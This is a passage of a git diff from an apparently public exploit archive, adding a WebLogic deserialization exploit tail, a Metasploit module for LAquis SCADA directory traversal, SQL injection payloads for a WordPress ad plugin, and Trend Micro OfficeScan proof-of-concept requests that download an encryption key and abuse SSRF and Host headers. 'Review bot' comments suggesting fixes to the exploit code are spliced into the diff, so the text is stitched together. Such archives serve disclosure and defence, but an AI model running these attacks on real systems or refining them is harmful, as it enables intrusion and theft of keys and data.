'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c
\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +totallength = len(chunk1) + len(chunk2) + len(chunk3) +print "[+]TOTAL payload length: ", totallength + +#Update the TOTAL payload length in Chunk1 +len_hex = hex(totallength) +print "[+]Payload length in HEX: ", len_hex +len_hex = len_hex.replace('0x', '0') +print "[+]Payload length in HEX: " , len_hex + +s1 = len_hex[:2] +s2 = len_hex[2:4] +len_hex = unhexlify(s1 + s2) + +print "[+]Payload length in HEX now: ", len_hex + +#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2) +print 
"[+]Updating Chunk1 according to the TOTAL payload length..." + +chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + +#print "[+]Updated 'chunk1' : \n", chunk1 + +#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1' +payload = chunk1 + chunk2 + chunk3 + +#Adjust header for appropriate message length +payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) +print '[+]Sending payload...' +sock.send(payload) + +print "[+]Done! 
You should see ICMP ECHO requests from your target to your attacking machine!!" +print("\n[+]Response to Request#: \n") +response = sock.recv(15000) +print(response) + diff --git a/platforms/linux/remote/41910.sh b/platforms/linux/remote/41910.sh index 6de4e57e0..b7c340c52 100755 --- a/platforms/linux/remote/41910.sh +++ b/platforms/linux/remote/41910.sh @@ -8,9 +8,9 @@ int='\033[94m /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ -SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) +SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) -SquirrelMail_RCE_exploit.sh (ver. 1.0) +SquirrelMail_RCE_exploit.sh (ver. 1.1) Discovered and coded by @@ -190,4 +190,5 @@ fi # Done -echo -e "\n[*] All done. Exiting" \ No newline at end of file +echo -e "\n[*] All done. Exiting" + diff --git a/platforms/multiple/remote/42885.rb b/platforms/multiple/remote/42885.rb new file mode 100755 index 000000000..6a1c65947 --- /dev/null +++ b/platforms/multiple/remote/42885.rb 
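Review bot: The argument check `if len(sys.argv) < 2:` is off by one — `sys.argv[2]` is read two lines later for the port, so a single-argument call dies with an IndexError instead of printing the usage message; it should be `if len(sys.argv) < 3:`. The hand-rolled length patching from `len_hex = hex(totallength)` down to the rebuilt `chunk1` is dead code, because the `struct.pack('!i', len(payload))` line rewrites the first four bytes of the message anyway, and it only produces two correct bytes when the total length happens to be exactly three hex digits, so removing it would also remove a silent corruption path. The comment above `chunk2` says the embedded ping goes to 10.40.1.39, but the bytes in `chunk2` encode a different address, so the comment should be corrected to match whatever ysoserial run actually produced that chunk. `#!/usr/bin/env python` is not the first line of the file, so the shebang has no effect, and the print statements make this Python 2 only — worth stating in the header since the file carries no version note; the socket is also never closed.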
@@ -0,0 +1,185 @@ +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'LAquis SCADA Web Server Directory Traversal Information Disclosure', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in the LAquis SCADA + application. The vulnerability is triggered when sending a series of dot dot slashes + (../) to the vulnerable NOME parameter found on the listagem.laquis file. + + This module was tested against v4.1.0.2385 + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2017-6020' ], + [ 'ZDI', '17-286' ], + [ 'BID', '97055' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-082-01' ] + ], + 'DisclosureDate' => 'Mar 29 2017')) + + register_options( + [ + OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]), + OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']), + Opt::RPORT(1234) + ], self.class ) + end + + def run + + depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 
10 : datastore['DEPTH'] + levels = "/" + ("../" * depth) + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/' + }) + + # make sure the webserver is actually listening + if res.code == 200 + blob = res.body.to_s.scan(/(?<=href=)[A-Za-z0-9.?=&+]+/) + + for url in blob + if url =~ /listagem/ + listagem = url + end + end + + # make sure the vulnerable page is there + # not all of the examples include the + # vulnerable page, so we test to ensure + # that it is there prior to executing our code + # there is a potential that real world may not + # include the vulnerable page in some cases + # as well + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{listagem}", + }) + + # trigger + if res.code == 200 and res.body.to_s =~ /Listagem<\/title><\/head>/ + + loot = [] + file_path = "#{datastore['FILE']}" + file_path = file_path.gsub(/\//, "\\") + cleanup = "#{listagem}" + cleanup = cleanup.gsub(/DATA=/, "DATA=#{Rex::Text.rand_text_alphanumeric(15)}") + cleanup = cleanup.gsub(/botao=Enviar\+consulta/, "botao=Submit\+Query") + vulnerability = listagem.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{levels}#{file_path}") + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{vulnerability}" + }) + + if res and res.code == 200 + blob = res.body.to_s + blob.each_line do |line| + loot << line.match(/.* <\/font><\/td>.*$/) + end + + loot = loot.join.gsub(/ <\/font><\/td>/, "\r\n") + + if not loot or loot.empty? 
+ print_status("File from \'#{rhost}:#{rport}\' is empty...") + return + end + file = ::File.basename(datastore['FILE']) + path = store_loot('laquis.file', 'application/octet-stream', rhost, loot, file, datastore['FILE']) + print_status("Stored \'#{datastore['FILE']}\' to \'#{path}\'") + + # cleaning up afterwards because the response + # data from before is written and becomes + # persistent + referer = cleanup.gsub(/DATA=[A-Za-z0-9]+/, "DATA=") + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{listagem}" + }) + + if res.code == 200 + nome = res.body.to_s.match(/(?<=<input type=hidden name=NOME value=")[A-Za-z0-9.]+/) + cleanup = cleanup.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{nome}") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{cleanup}", + 'headers' => { + 'Referer' => "http://#{rhost}:#{rport}/#{referer}", + 'Accept-Language' => 'en-US,en;q=0.5', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'close', + 'Upgrade-Insecure-Requests' => '1', + 'Cache-Control' => 'max-age=0' + } + }) + end + + return + + end + + else + print_error("Vulnerable page does not exist...") + end + + else + print_error("The server does not appear to be listening...") + end + + end +end +__END__ +msf auxiliary(laquis_directory_traversal) > show options + +Module options (auxiliary/server/laquis_directory_traversal): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DEPTH 10 no Levels to reach base directory + FILE Windows/System32/drivers/etc/hosts no This is the file to download + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOST 192.168.1.2 yes The target address + RPORT 1234 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + +msf auxiliary(laquis_directory_traversal) > rexploit +[*] Reloading module... 
+ +[*] Stored 'Windows/System32/drivers/etc/hosts' to '/home/james/.msf4/loot/20170927110756_default_192.168.1.2_laquis.file_227964.bin' +[*] Auxiliary module execution completed + +james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677204.bin +# Copyright (c) 1993-2009 Microsoft Corp. +# +# This is a sample HOSTS file used by Microsoft TCP/IP for Windows. +# +# This file contains the mappings of IP addresses to host names. Each +# entry should be kept on an individual line. The IP address should +# be placed in the first column followed by the corresponding host name. +# The IP address and the host name should be separated by at least one +# space. +# +# Additionally, comments (such as these) may be inserted on individual +# lines or following the machine name denoted by a '#' symbol. +# +# For example: +# +# 102.54.94.97 rhino.acme.com # source server +# 38.25.63.10 x.acme.com # x client host + +# localhost name resolution is handled within DNS itself. +# +# + diff --git a/platforms/php/webapps/42380.txt b/platforms/php/webapps/42380.txt new file mode 100755 index 000000000..6bebdae31 --- /dev/null +++ b/platforms/php/webapps/42380.txt 
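Review bot: `res.code` is dereferenced right after the first `send_request_raw` in `run` with no nil check, so when the connection is refused or times out (where `send_request_raw` returns nil) the module raises NoMethodError instead of reaching the `print_error("The server does not appear to be listening...")` branch that was clearly written for that case; the later `if res and res.code == 200` shows the intended form, and both the first check and the `/#{listagem}` one should become `if res && res.code == 200`. When no href matches `/listagem/`, `listagem` stays nil, the second request goes to `/`, and its body is tested against the `Listagem<\/title>` regex, so the "Vulnerable page does not exist..." error fires for the wrong reason; a `return print_error('No listagem link found on the index page') if listagem.nil?` after the loop makes that explicit. The `for url in blob` loop is an un-idiomatic search in Ruby — `listagem = blob.find { |url| url =~ /listagem/ }` does the same in one line (note it keeps the first match where the loop keeps the last; check which the target page needs). The `__END__` session transcript, including the loot path under the author's home directory, is documentation and could be trimmed to the `show options` table.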
@@ -0,0 +1,46 @@
+# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi
+# Date: 2017-07-25
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://adspro.scripteo.info/
+# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010
+# Version: 3.4
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-07-25
+
+Product & Service Introduction:
+===============================
+Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can.
+
+Technical Details & Description:
+================================
+
+Multiple Stored XSS vulnerabilities found.
+
+Blind SQL Injection on bsa_pro_id parameter.
+
+Proof of Concept (PoC):
+=======================
+
+Stored XSS:
+
+On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed.
+
+Blind SQL Injection:
+
+Parameter: bsa_pro_id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5)
+
+Credits & Authors:
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42889.txt b/platforms/php/webapps/42889.txt
new file mode 100755
index 000000000..ca7f99ee7
--- /dev/null
+++ b/platforms/php/webapps/42889.txt
@@ -0,0 +1,113 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+Vulnerability Type:
+===================
+Unauthorized Encryption Key Disclosure
+
+
+
+CVE Reference:
+==============
+CVE-2017-14083
+
+
+
+Security Issue:
+================
+Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application which usually runs on port 4343 can download
+the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process.
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+e.g.
+
+In "config.php"
+
+/* *********************************************************
+ * Encryption module configurations
+ */
+$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key"; <============= HERE
+$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ...
+/* *********************************************************
+ * Framework configurations
+ */
+
+
+
+Exploit/POC:
+=============
+
+[root@localhost /]# wget --no-check-certificate https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
+--14:59:52-- https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
+Connecting to VICTIM-IP:4343... connected.
+WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
+ Self-signed certificate encountered.
+HTTP request sent, awaiting response... 200 OK
+Length: 32 [application/octet-stream]
+Saving to: `crypt.key'
+
+100%[==================================================================================================>] 32 --.-K/s in 0s
+
+14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: May 31, 2017
+Vendor: "hotfix in progress". June 23, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/php/webapps/42893.txt b/platforms/php/webapps/42893.txt
new file mode 100755
index 000000000..b4d575352
--- /dev/null
+++ b/platforms/php/webapps/42893.txt
@@ -0,0 +1,162 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+===========
+OfficeScan
+v11.0 and XG (12.0)*
+
+
+Vulnerability Type:
+===================
+Unauthorized NT Domain Disclosure
+Unauthorized PHP Information Disclosure
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+CVE Reference:
+==============
+CVE-2017-14085
+
+
+
+Security Issue(s):
+================
+( NT Domain Disclosure )
+Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG application can query the networks NT domains.
+NT enumeration is leaked by the web interface when it should not do so. Usually, you use NET commands so while this NT enumeration
+is not high in severity, it should not return this information and especially to unauthorized users as it can aid in launching
+further attacks.
+
+
+( PHP Information Disclosure )
+Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG application can query the PHP version and modules.
+
+In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but session or authentication check is made.
+
+$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
+$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
+$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);
+
+etc...
+
+
+References:
+===========
+https://success.trendmicro.com/solution/1118372
+
+
+
+Exploit/POC (NT Domain Disclosure):
+=====================================
+[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
+* About to connect() to VICTIM-IP port 4343
+* Trying VICTIM-IP... connected
+
+
+< HTTP/1.1 200 OK
+< Pragma: no-cache
+< Content-Type: text/plain;charset=utf-8
+< Server: Microsoft-IIS/7.5
+< X-Powered-By: ASP.NET
+< Date: Thu, 01 Jun 2017 15:27:27 GMT
+< Connection: close
+< Content-Length: 510
+{
+ "ERROR" : {
+ "ERROR_CODE" : 0
+ },
+ "RESPONSE" : {
+ "NODES" : [
+ {
+ "NAME" : "Avaya"
+ },
+ {
+ "NAME" : "Km-netprinters"
+ },
+ {
+ "NAME" : "Mshome"
+ },
+ {
+ "NAME" : "Printserver"
+ },
+ {
+ "NAME" : "MyDomain"
+ },
+ {
+ "NAME" : "Workgroup"
+ },
+ {
+ "NAME" : "Xpemb"
+ }
+ ]
+ }
+}
+
+
+Exploit / POC (PHP Information Disclosure):
+============================================
+c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php
+
+HTTP/1.1 200 OK
+
+[INI_UPDATE_SECTION]
+
+>>>> Start Anaylze WGF : 2017-06-02 15:58:26
+[INFO] Current PHP version: 7.0.6
+[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet
+[INFO] WGF version : 3.8
+[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
+[INFO] WGF is /path/to/widgets_new exists : true
+[ERROR] C:\Windows\TEMP check read/write permissions : failed
+To solved this problem please reference document here.
+
+etc...
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=====================
+Vendor Notification: June 2, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/php/webapps/42894.txt b/platforms/php/webapps/42894.txt
new file mode 100755
index 000000000..3bb0147c5
--- /dev/null
+++ b/platforms/php/webapps/42894.txt
@@ -0,0 +1,89 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+===========
+OfficeScan
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+Vulnerability Type:
+===================
+Unautherized Server Side Request Forgery
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+Unauthorized LAN attackers that can reach the OfficeScan XG application can make arbitrary HTTP requests to external and internal servers.
+Abusing a Server Side Request Forgery flaw in the "help_Proxy.php" functionality.
+
+
+
+
+Exploit/POC:
+=============
+https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://<REQUESTED-IP>:8080
+
+python -m SimpleHTTPServer 8080
+Serving HTTP on 0.0.0.0 port 8080 ...
+
+<REQUESTED-IP> - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 -
+
+help_proxy.php HTTP response:
+{"request_url":"http:\/\/<REQUESTED-IP>:8080","http_code":200,"flag":1}
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: May 31, 2017
+Vendor reply: "We confirmed that this is a valid vulnerability. We are now working on a hotfix to remediate the issue." : June 30, 2017
+Vendor releases fixes / advisory : September 27, 2017
+September 28, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/platforms/php/webapps/42895.txt b/platforms/php/webapps/42895.txt
new file mode 100755
index 000000000..ca1efe018
--- /dev/null
+++ b/platforms/php/webapps/42895.txt
@@ -0,0 +1,82 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.trendmicro.com
+
+
+
+Product:
+========
+OfficeScan
+v11.0 and XG (12.0)*
+
+
+OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
+An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
+manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
+web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
+
+
+
+Vulnerability Type:
+===================
+Host Header Injection
+
+
+
+CVE Reference:
+==============
+CVE-2017-14087
+
+
+
+Security Issue:
+================
+Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME'].
+In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary
+links that point to a malicious website.
+
+
+Exploit/POC:
+=============
+
+c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+==================================
